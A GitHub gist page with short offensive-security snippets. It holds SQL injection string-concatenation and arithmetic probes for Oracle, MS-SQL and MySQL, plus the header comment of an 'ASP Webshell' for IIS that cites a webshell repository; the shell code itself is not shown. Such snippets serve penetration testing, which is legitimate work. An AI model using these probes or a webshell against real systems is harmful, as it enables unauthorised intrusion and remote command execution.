Skip to content

Instantly share code, notes, and snippets.

View saveeo's full-sized avatar
🎯
Focusing

savio saveeo

🎯
Focusing
  • localhost
View GitHub Profile
#oracle
'||'FOO
#MS-SQL
'+'FOO
#mysql
' 'FOO
%
1+1
67-ASCII('A') ##equivalent 2
51-ASCII(1)
<!--
ASP Webshell
Working on latest IIS
Referance :-
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp
http://stackoverflow.com/questions/11501044/i-need-execute-a-command-line-in-a-visual-basic-script
http://www.w3schools.com/asp/